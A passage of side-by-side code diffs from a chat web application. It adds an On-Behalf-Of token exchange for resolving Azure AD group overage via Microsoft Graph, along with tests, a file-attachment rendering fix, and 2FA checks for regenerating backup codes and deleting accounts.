if (fileInfo.size > process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES) { if (fileInfo.size > maxFileSize) {
throw new Error( throw new Error(
`File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES} bytes.`, `File size is ${fileInfo.size} bytes. It exceeds the maximum limit of ${maxFileSize} bytes.`,
); );
} }

View file

@ -315,24 +315,85 @@ function convertToUsername(input, defaultValue = '') {
return defaultValue; return defaultValue;
} }
/**
* Exchange the access token for a Graph-scoped token using the On-Behalf-Of (OBO) flow.
*
* The original access token has the app's own audience (api://<client-id>), which Microsoft Graph
* rejects. This exchange produces a token with audience https://graph.microsoft.com and the
* minimum delegated scope (User.Read) required by /me/getMemberObjects.
*
* Uses a dedicated cache key (`${sub}:overage`) to avoid collisions with other OBO exchanges
* in the codebase (userinfo, Graph principal search).
*
* @param {string} accessToken - The original access token from the OpenID tokenset
* @param {string} sub - The subject identifier for cache keying
* @returns {Promise<string>} A Graph-scoped access token
* @see https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-on-behalf-of-flow
*/
async function exchangeTokenForOverage(accessToken, sub) {
if (!openidConfig) {
throw new Error('[openidStrategy] OpenID config not initialized; cannot exchange OBO token');
}
const tokensCache = getLogStores(CacheKeys.OPENID_EXCHANGED_TOKENS);
const cacheKey = `${sub}:overage`;
const cached = await tokensCache.get(cacheKey);
if (cached?.access_token) {
logger.debug('[openidStrategy] Using cached Graph token for overage resolution');
return cached.access_token;
}
const grantResponse = await client.genericGrantRequest(
openidConfig,
'urn:ietf:params:oauth:grant-type:jwt-bearer',
{
scope: 'https://graph.microsoft.com/User.Read',
assertion: accessToken,
requested_token_use: 'on_behalf_of',
},
);
if (!grantResponse.access_token) {
throw new Error(
'[openidStrategy] OBO exchange succeeded but returned no access_token; cannot call Graph API',
);
}
const ttlMs =
Number.isFinite(grantResponse.expires_in) && grantResponse.expires_in > 0
? grantResponse.expires_in * 1000
: 3600 * 1000;
await tokensCache.set(cacheKey, { access_token: grantResponse.access_token }, ttlMs);
return grantResponse.access_token;
}
/** /**
* Resolve Azure AD groups when group overage is in effect (groups moved to _claim_names/_claim_sources). * Resolve Azure AD groups when group overage is in effect (groups moved to _claim_names/_claim_sources).
* *
* NOTE: Microsoft recommends treating _claim_names/_claim_sources as a signal only and using Microsoft Graph * NOTE: Microsoft recommends treating _claim_names/_claim_sources as a signal only and using Microsoft Graph
* to resolve group membership instead of calling the endpoint in _claim_sources directly. * to resolve group membership instead of calling the endpoint in _claim_sources directly.
* *
* @param {string} accessToken - Access token with Microsoft Graph permissions * Before calling Graph, the access token is exchanged via the OBO flow to obtain a token with the
* correct audience (https://graph.microsoft.com) and User.Read scope.
*
* @param {string} accessToken - Access token from the OpenID tokenset (app audience)
* @param {string} sub - The subject identifier of the user (for OBO exchange and cache keying)
* @returns {Promise<string[] | null>} Resolved group IDs or null on failure * @returns {Promise<string[] | null>} Resolved group IDs or null on failure
* @see https://learn.microsoft.com/en-us/entra/identity-platform/access-token-claims-reference#groups-overage-claim * @see https://learn.microsoft.com/en-us/entra/identity-platform/access-token-claims-reference#groups-overage-claim
* @see https://learn.microsoft.com/en-us/graph/api/directoryobject-getmemberobjects * @see https://learn.microsoft.com/en-us/graph/api/directoryobject-getmemberobjects
*/ */
async function resolveGroupsFromOverage(accessToken) { async function resolveGroupsFromOverage(accessToken, sub) {
try { try {
if (!accessToken) { if (!accessToken) {
logger.error('[openidStrategy] Access token missing; cannot resolve group overage'); logger.error('[openidStrategy] Access token missing; cannot resolve group overage');
return null; return null;
} }
const graphToken = await exchangeTokenForOverage(accessToken, sub);
// Use /me/getMemberObjects so least-privileged delegated permission User.Read is sufficient // Use /me/getMemberObjects so least-privileged delegated permission User.Read is sufficient
// when resolving the signed-in user's group membership. // when resolving the signed-in user's group membership.
const url = 'https://graph.microsoft.com/v1.0/me/getMemberObjects'; const url = 'https://graph.microsoft.com/v1.0/me/getMemberObjects';
@ -344,7 +405,7 @@ async function resolveGroupsFromOverage(accessToken) {
const fetchOptions = { const fetchOptions = {
method: 'POST', method: 'POST',
headers: { headers: {
Authorization: `Bearer ${accessToken}`, Authorization: `Bearer ${graphToken}`,
'Content-Type': 'application/json', 'Content-Type': 'application/json',
}, },
body: JSON.stringify({ securityEnabledOnly: false }), body: JSON.stringify({ securityEnabledOnly: false }),
@ -364,6 +425,7 @@ async function resolveGroupsFromOverage(accessToken) {
} }
const data = await response.json(); const data = await response.json();
const values = Array.isArray(data?.value) ? data.value : null; const values = Array.isArray(data?.value) ? data.value : null;
if (!values) { if (!values) {
logger.error( logger.error(
@ -432,6 +494,8 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) {
const fullName = getFullName(userinfo); const fullName = getFullName(userinfo);
const requiredRole = process.env.OPENID_REQUIRED_ROLE; const requiredRole = process.env.OPENID_REQUIRED_ROLE;
let resolvedOverageGroups = null;
if (requiredRole) { if (requiredRole) {
const requiredRoles = requiredRole const requiredRoles = requiredRole
.split(',') .split(',')
@ -451,19 +515,21 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) {
// Handle Azure AD group overage for ID token groups: when hasgroups or _claim_* indicate overage, // Handle Azure AD group overage for ID token groups: when hasgroups or _claim_* indicate overage,
// resolve groups via Microsoft Graph instead of relying on token group values. // resolve groups via Microsoft Graph instead of relying on token group values.
const hasOverage =
decodedToken?.hasgroups ||
(decodedToken?._claim_names?.groups &&
decodedToken?._claim_sources?.[decodedToken._claim_names.groups]);
if ( if (
!Array.isArray(roles) &&
typeof roles !== 'string' &&
requiredRoleTokenKind === 'id' && requiredRoleTokenKind === 'id' &&
requiredRoleParameterPath === 'groups' && requiredRoleParameterPath === 'groups' &&
decodedToken && decodedToken &&
(decodedToken.hasgroups || hasOverage
(decodedToken._claim_names?.groups &&
decodedToken._claim_sources?.[decodedToken._claim_names.groups]))
) { ) {
const overageGroups = await resolveGroupsFromOverage(tokenset.access_token); const overageGroups = await resolveGroupsFromOverage(tokenset.access_token, claims.sub);
if (overageGroups) { if (overageGroups) {
roles = overageGroups; roles = overageGroups;
resolvedOverageGroups = overageGroups;
} }
} }
@ -550,7 +616,25 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) {
throw new Error('Invalid admin role token kind'); throw new Error('Invalid admin role token kind');
} }
const adminRoles = get(adminRoleObject, adminRoleParameterPath); let adminRoles = get(adminRoleObject, adminRoleParameterPath);
// Handle Azure AD group overage for admin role when using ID token groups
if (adminRoleTokenKind === 'id' && adminRoleParameterPath === 'groups' && adminRoleObject) {
const hasAdminOverage =
adminRoleObject.hasgroups ||
(adminRoleObject._claim_names?.groups &&
adminRoleObject._claim_sources?.[adminRoleObject._claim_names.groups]);
if (hasAdminOverage) {
const overageGroups =
resolvedOverageGroups ||
(await resolveGroupsFromOverage(tokenset.access_token, claims.sub));
if (overageGroups) {
adminRoles = overageGroups;
}
}
}
let adminRoleValues = []; let adminRoleValues = [];
if (Array.isArray(adminRoles)) { if (Array.isArray(adminRoles)) {
adminRoleValues = adminRoles; adminRoleValues = adminRoles;

View file

@ -64,6 +64,10 @@ jest.mock('openid-client', () => {
// Only return additional properties, but don't override any claims // Only return additional properties, but don't override any claims
return Promise.resolve({}); return Promise.resolve({});
}), }),
genericGrantRequest: jest.fn().mockResolvedValue({
access_token: 'exchanged_graph_token',
expires_in: 3600,
}),
customFetch: Symbol('customFetch'), customFetch: Symbol('customFetch'),
}; };
}); });
@ -730,7 +734,7 @@ describe('setupOpenId', () => {
expect.objectContaining({ expect.objectContaining({
method: 'POST', method: 'POST',
headers: expect.objectContaining({ headers: expect.objectContaining({
Authorization: `Bearer ${tokenset.access_token}`, Authorization: 'Bearer exchanged_graph_token',
}), }),
}), }),
); );
@ -745,6 +749,313 @@ describe('setupOpenId', () => {
); );
}); });
describe('OBO token exchange for overage', () => {
it('exchanges access token via OBO before calling Graph API', async () => {
const openidClient = require('openid-client');
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required'] }),
});
await validate(tokenset);
expect(openidClient.genericGrantRequest).toHaveBeenCalledWith(
expect.anything(),
'urn:ietf:params:oauth:grant-type:jwt-bearer',
expect.objectContaining({
scope: 'https://graph.microsoft.com/User.Read',
assertion: tokenset.access_token,
requested_token_use: 'on_behalf_of',
}),
);
expect(undici.fetch).toHaveBeenCalledWith(
'https://graph.microsoft.com/v1.0/me/getMemberObjects',
expect.objectContaining({
headers: expect.objectContaining({
Authorization: 'Bearer exchanged_graph_token',
}),
}),
);
});
it('caches the exchanged token and reuses it on subsequent calls', async () => {
const openidClient = require('openid-client');
const getLogStores = require('~/cache/getLogStores');
const mockSet = jest.fn();
const mockGet = jest
.fn()
.mockResolvedValueOnce(undefined)
.mockResolvedValueOnce({ access_token: 'exchanged_graph_token' });
getLogStores.mockReturnValue({ get: mockGet, set: mockSet });
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required'] }),
});
// First call: cache miss → OBO exchange → cache set
await validate(tokenset);
expect(mockSet).toHaveBeenCalledWith(
'1234:overage',
{ access_token: 'exchanged_graph_token' },
3600000,
);
expect(openidClient.genericGrantRequest).toHaveBeenCalledTimes(1);
// Second call: cache hit → no new OBO exchange
openidClient.genericGrantRequest.mockClear();
await validate(tokenset);
expect(openidClient.genericGrantRequest).not.toHaveBeenCalled();
});
});
describe('admin role group overage', () => {
it('resolves admin groups via Graph when overage is detected for admin role', async () => {
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required', 'admin-group-id'] }),
});
const { user } = await validate(tokenset);
expect(user.role).toBe('ADMIN');
});
it('does not grant admin when overage groups do not contain admin role', async () => {
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required', 'other-group'] }),
});
const { user } = await validate(tokenset);
expect(user).toBeTruthy();
expect(user.role).toBeUndefined();
});
it('reuses already-resolved overage groups for admin role check (no duplicate Graph call)', async () => {
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required', 'admin-group-id'] }),
});
await validate(tokenset);
// Graph API should be called only once (for required role), admin role reuses the result
expect(undici.fetch).toHaveBeenCalledTimes(1);
});
it('demotes existing admin when overage groups no longer contain admin role', async () => {
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
const existingAdminUser = {
_id: 'existingAdminId',
provider: 'openid',
email: tokenset.claims().email,
openidId: tokenset.claims().sub,
username: 'adminuser',
name: 'Admin User',
role: 'ADMIN',
};
findUser.mockImplementation(async (query) => {
if (query.openidId === tokenset.claims().sub || query.email === tokenset.claims().email) {
return existingAdminUser;
}
return null;
});
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required'] }),
});
const { user } = await validate(tokenset);
expect(user.role).toBe('USER');
});
it('does not attempt overage for admin role when token kind is not id', async () => {
process.env.OPENID_REQUIRED_ROLE = 'requiredRole';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'roles';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'access';
jwtDecode.mockReturnValue({
roles: ['requiredRole'],
hasgroups: true,
});
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
const { user } = await validate(tokenset);
// No Graph call since admin uses access token (not id)
expect(undici.fetch).not.toHaveBeenCalled();
expect(user.role).toBeUndefined();
});
it('resolves admin via Graph independently when OPENID_REQUIRED_ROLE is not configured', async () => {
delete process.env.OPENID_REQUIRED_ROLE;
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['admin-group-id'] }),
});
const { user } = await validate(tokenset);
expect(user.role).toBe('ADMIN');
expect(undici.fetch).toHaveBeenCalledTimes(1);
});
it('denies admin when OPENID_REQUIRED_ROLE is absent and Graph does not contain admin group', async () => {
delete process.env.OPENID_REQUIRED_ROLE;
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['other-group'] }),
});
const { user } = await validate(tokenset);
expect(user).toBeTruthy();
expect(user.role).toBeUndefined();
});
it('denies login and logs error when OBO exchange throws', async () => {
const openidClient = require('openid-client');
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
openidClient.genericGrantRequest.mockRejectedValueOnce(new Error('OBO exchange rejected'));
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
const { user, details } = await validate(tokenset);
expect(user).toBe(false);
expect(details.message).toBe('You must have "group-required" role to log in.');
expect(undici.fetch).not.toHaveBeenCalled();
});
it('denies login when OBO exchange returns no access_token', async () => {
const openidClient = require('openid-client');
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
openidClient.genericGrantRequest.mockResolvedValueOnce({ expires_in: 3600 });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
const { user, details } = await validate(tokenset);
expect(user).toBe(false);
expect(details.message).toBe('You must have "group-required" role to log in.');
expect(undici.fetch).not.toHaveBeenCalled();
});
});
it('should attempt to download and save the avatar if picture is provided', async () => { it('should attempt to download and save the avatar if picture is provided', async () => {
// Act // Act
const { user } = await validate(tokenset); const { user } = await validate(tokenset);

View file

@ -1,5 +1,4 @@
// --- Mocks --- // --- Mocks ---
jest.mock('tiktoken');
jest.mock('fs'); jest.mock('fs');
jest.mock('path'); jest.mock('path');
jest.mock('node-fetch'); jest.mock('node-fetch');

View file

@ -91,7 +91,7 @@ function AttachFileChat({
if (isAssistants && endpointSupportsFiles && !isUploadDisabled) { if (isAssistants && endpointSupportsFiles && !isUploadDisabled) {
return <AttachFile disabled={disableInputs} />; return <AttachFile disabled={disableInputs} />;
} else if (isAgents || (endpointSupportsFiles && !isUploadDisabled)) { } else if ((isAgents || endpointSupportsFiles) && !isUploadDisabled) {
return ( return (
<AttachFileMenu <AttachFileMenu
endpoint={endpoint} endpoint={endpoint}

View file

@ -13,7 +13,7 @@ const mockEndpointsConfig: TEndpointsConfig = {
Moonshot: { type: EModelEndpoint.custom, userProvide: false, order: 9999 }, Moonshot: { type: EModelEndpoint.custom, userProvide: false, order: 9999 },
}; };
const mockFileConfig = mergeFileConfig({ const defaultFileConfig = mergeFileConfig({
endpoints: { endpoints: {
Moonshot: { fileLimit: 5 }, Moonshot: { fileLimit: 5 },
[EModelEndpoint.agents]: { fileLimit: 20 }, [EModelEndpoint.agents]: { fileLimit: 20 },
@ -21,6 +21,8 @@ const mockFileConfig = mergeFileConfig({
}, },
}); });
let mockFileConfig = defaultFileConfig;
let mockAgentsMap: Record<string, Partial<Agent>> = {}; let mockAgentsMap: Record<string, Partial<Agent>> = {};
let mockAgentQueryData: Partial<Agent> | undefined; let mockAgentQueryData: Partial<Agent> | undefined;
@ -65,6 +67,7 @@ function renderComponent(conversation: Record<string, unknown> | null, disableIn
describe('AttachFileChat', () => { describe('AttachFileChat', () => {
beforeEach(() => { beforeEach(() => {
mockFileConfig = defaultFileConfig;
mockAgentsMap = {}; mockAgentsMap = {};
mockAgentQueryData = undefined; mockAgentQueryData = undefined;
mockAttachFileMenuProps = {}; mockAttachFileMenuProps = {};
@ -148,6 +151,60 @@ describe('AttachFileChat', () => {
}); });
}); });
describe('upload disabled rendering', () => {
it('renders null for agents endpoint when fileConfig.agents.disabled is true', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
[EModelEndpoint.agents]: { disabled: true },
},
});
const { container } = renderComponent({
endpoint: EModelEndpoint.agents,
agent_id: 'agent-1',
});
expect(container.innerHTML).toBe('');
});
it('renders null for agents endpoint when disableInputs is true', () => {
const { container } = renderComponent(
{ endpoint: EModelEndpoint.agents, agent_id: 'agent-1' },
true,
);
expect(container.innerHTML).toBe('');
});
it('renders AttachFile for assistants endpoint when not disabled', () => {
renderComponent({ endpoint: EModelEndpoint.assistants });
expect(screen.getByTestId('attach-file')).toBeInTheDocument();
});
it('renders AttachFileMenu when provider-specific config overrides agents disabled', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
Moonshot: { disabled: false, fileLimit: 5 },
[EModelEndpoint.agents]: { disabled: true },
},
});
mockAgentsMap = {
'agent-1': { provider: 'Moonshot', model_parameters: {} } as Partial<Agent>,
};
renderComponent({ endpoint: EModelEndpoint.agents, agent_id: 'agent-1' });
expect(screen.getByTestId('attach-file-menu')).toBeInTheDocument();
});
it('renders null for assistants endpoint when fileConfig.assistants.disabled is true', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
[EModelEndpoint.assistants]: { disabled: true },
},
});
const { container } = renderComponent({
endpoint: EModelEndpoint.assistants,
});
expect(container.innerHTML).toBe('');
});
});
describe('endpointFileConfig resolution', () => { describe('endpointFileConfig resolution', () => {
it('passes Moonshot-specific file config for agent with Moonshot provider', () => { it('passes Moonshot-specific file config for agent with Moonshot provider', () => {
mockAgentsMap = { mockAgentsMap = {

View file

@ -41,6 +41,7 @@ const errorMessages = {
[ErrorTypes.NO_USER_KEY]: 'com_error_no_user_key', [ErrorTypes.NO_USER_KEY]: 'com_error_no_user_key',
[ErrorTypes.INVALID_USER_KEY]: 'com_error_invalid_user_key', [ErrorTypes.INVALID_USER_KEY]: 'com_error_invalid_user_key',
[ErrorTypes.NO_BASE_URL]: 'com_error_no_base_url', [ErrorTypes.NO_BASE_URL]: 'com_error_no_base_url',
[ErrorTypes.INVALID_BASE_URL]: 'com_error_invalid_base_url',
[ErrorTypes.INVALID_ACTION]: `com_error_${ErrorTypes.INVALID_ACTION}`, [ErrorTypes.INVALID_ACTION]: `com_error_${ErrorTypes.INVALID_ACTION}`,
[ErrorTypes.INVALID_REQUEST]: `com_error_${ErrorTypes.INVALID_REQUEST}`, [ErrorTypes.INVALID_REQUEST]: `com_error_${ErrorTypes.INVALID_REQUEST}`,
[ErrorTypes.REFUSAL]: 'com_error_refusal', [ErrorTypes.REFUSAL]: 'com_error_refusal',

View file

@ -1,12 +1,23 @@
import React, { useState } from 'react'; import React, { useState } from 'react';
import { RefreshCcw } from 'lucide-react'; import { RefreshCcw } from 'lucide-react';
import { useSetRecoilState } from 'recoil';
import { motion, AnimatePresence } from 'framer-motion'; import { motion, AnimatePresence } from 'framer-motion';
import { TBackupCode, TRegenerateBackupCodesResponse, type TUser } from 'librechat-data-provider'; import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp';
import type {
TRegenerateBackupCodesResponse,
TRegenerateBackupCodesRequest,
TBackupCode,
TUser,
} from 'librechat-data-provider';
import { import {
OGDialog, InputOTPSeparator,
InputOTPGroup,
InputOTPSlot,
OGDialogContent, OGDialogContent,
OGDialogTitle, OGDialogTitle,
OGDialogTrigger, OGDialogTrigger,
OGDialog,
InputOTP,
Button, Button,
Label, Label,
Spinner, Spinner,
@ -15,7 +26,6 @@ import {
} from '@librechat/client'; } from '@librechat/client';
import { useRegenerateBackupCodesMutation } from '~/data-provider'; import { useRegenerateBackupCodesMutation } from '~/data-provider';
import { useAuthContext, useLocalize } from '~/hooks'; import { useAuthContext, useLocalize } from '~/hooks';
import { useSetRecoilState } from 'recoil';
import store from '~/store'; import store from '~/store';
const BackupCodesItem: React.FC = () => { const BackupCodesItem: React.FC = () => {
@ -24,25 +34,30 @@ const BackupCodesItem: React.FC = () => {
const { showToast } = useToastContext(); const { showToast } = useToastContext();
const setUser = useSetRecoilState(store.user); const setUser = useSetRecoilState(store.user);
const [isDialogOpen, setDialogOpen] = useState<boolean>(false); const [isDialogOpen, setDialogOpen] = useState<boolean>(false);
const [otpToken, setOtpToken] = useState('');
const [useBackup, setUseBackup] = useState(false);
const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation(); const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation();
const needs2FA = !!user?.twoFactorEnabled;
const fetchBackupCodes = (auto: boolean = false) => { const fetchBackupCodes = (auto: boolean = false) => {
regenerateBackupCodes(undefined, { let payload: TRegenerateBackupCodesRequest | undefined;
if (needs2FA && otpToken.trim()) {
payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() };
}
regenerateBackupCodes(payload, {
onSuccess: (data: TRegenerateBackupCodesResponse) => { onSuccess: (data: TRegenerateBackupCodesResponse) => {
const newBackupCodes: TBackupCode[] = data.backupCodesHash.map((codeHash) => ({ const newBackupCodes: TBackupCode[] = data.backupCodesHash;
codeHash,
used: false,
usedAt: null,
}));
setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser); setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser);
setOtpToken('');
showToast({ showToast({
message: localize('com_ui_backup_codes_regenerated'), message: localize('com_ui_backup_codes_regenerated'),
status: 'success', status: 'success',
}); });
// Trigger file download only when user explicitly clicks the button.
if (!auto && newBackupCodes.length) { if (!auto && newBackupCodes.length) {
const codesString = data.backupCodes.join('\n'); const codesString = data.backupCodes.join('\n');
const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' }); const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' });
@ -66,6 +81,8 @@ const BackupCodesItem: React.FC = () => {
fetchBackupCodes(false); fetchBackupCodes(false);
}; };
const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6);
return ( return (
<OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}> <OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}>
<div className="flex items-center justify-between"> <div className="flex items-center justify-between">
@ -161,10 +178,10 @@ const BackupCodesItem: React.FC = () => {
); );
})} })}
</div> </div>
<div className="mt-12 flex justify-center"> <div className="mt-6 flex justify-center">
<Button <Button
onClick={handleRegenerate} onClick={handleRegenerate}
disabled={isLoading} disabled={isLoading || !otpReady}
variant="default" variant="default"
className="px-8 py-3 transition-all disabled:opacity-50" className="px-8 py-3 transition-all disabled:opacity-50"
> >
@ -183,7 +200,7 @@ const BackupCodesItem: React.FC = () => {
<div className="flex flex-col items-center gap-4 p-6 text-center"> <div className="flex flex-col items-center gap-4 p-6 text-center">
<Button <Button
onClick={handleRegenerate} onClick={handleRegenerate}
disabled={isLoading} disabled={isLoading || !otpReady}
variant="default" variant="default"
className="px-8 py-3 transition-all disabled:opacity-50" className="px-8 py-3 transition-all disabled:opacity-50"
> >
@ -192,6 +209,59 @@ const BackupCodesItem: React.FC = () => {
</Button> </Button>
</div> </div>
)} )}
{needs2FA && (
<div className="mt-6 space-y-3">
<Label className="text-sm font-medium">
{localize('com_ui_2fa_verification_required')}
</Label>
<div className="flex justify-center">
<InputOTP
value={otpToken}
onChange={setOtpToken}
maxLength={useBackup ? 8 : 6}
pattern={useBackup ? REGEXP_ONLY_DIGITS_AND_CHARS : REGEXP_ONLY_DIGITS}
className="gap-2"
>
{useBackup ? (
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
<InputOTPSlot index={6} />
<InputOTPSlot index={7} />
</InputOTPGroup>
) : (
<>
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
</InputOTPGroup>
<InputOTPSeparator />
<InputOTPGroup>
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
</InputOTPGroup>
</>
)}
</InputOTP>
</div>
<button
type="button"
onClick={() => {
setUseBackup(!useBackup);
setOtpToken('');
}}
className="text-sm text-primary hover:underline"
>
{useBackup ? localize('com_ui_use_2fa_code') : localize('com_ui_use_backup_code')}
</button>
</div>
)}
</motion.div> </motion.div>
</AnimatePresence> </AnimatePresence>
</OGDialogContent> </OGDialogContent>

View file

@ -1,16 +1,22 @@
import { LockIcon, Trash } from 'lucide-react';
import React, { useState, useCallback } from 'react'; import React, { useState, useCallback } from 'react';
import { LockIcon, Trash } from 'lucide-react';
import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp';
import { import {
Label, InputOTPSeparator,
Input,
Button,
Spinner,
OGDialog,
OGDialogContent, OGDialogContent,
OGDialogTrigger, OGDialogTrigger,
OGDialogHeader, OGDialogHeader,
InputOTPGroup,
OGDialogTitle, OGDialogTitle,
InputOTPSlot,
OGDialog,
InputOTP,
Spinner,
Button,
Label,
Input,
} from '@librechat/client'; } from '@librechat/client';
import type { TDeleteUserRequest } from 'librechat-data-provider';
import { useDeleteUserMutation } from '~/data-provider'; import { useDeleteUserMutation } from '~/data-provider';
import { useAuthContext } from '~/hooks/AuthContext'; import { useAuthContext } from '~/hooks/AuthContext';
import { LocalizeFunction } from '~/common'; import { LocalizeFunction } from '~/common';
@ -21,16 +27,27 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
const localize = useLocalize(); const localize = useLocalize();
const { user, logout } = useAuthContext(); const { user, logout } = useAuthContext();
const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({ const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({
onMutate: () => logout(), onSuccess: () => logout(),
}); });
const [isDialogOpen, setDialogOpen] = useState<boolean>(false); const [isDialogOpen, setDialogOpen] = useState<boolean>(false);
const [isLocked, setIsLocked] = useState(true); const [isLocked, setIsLocked] = useState(true);
const [otpToken, setOtpToken] = useState('');
const [useBackup, setUseBackup] = useState(false);
const needs2FA = !!user?.twoFactorEnabled;
const handleDeleteUser = () => { const handleDeleteUser = () => {
if (!isLocked) { if (isLocked) {
deleteUser(undefined); return;
} }
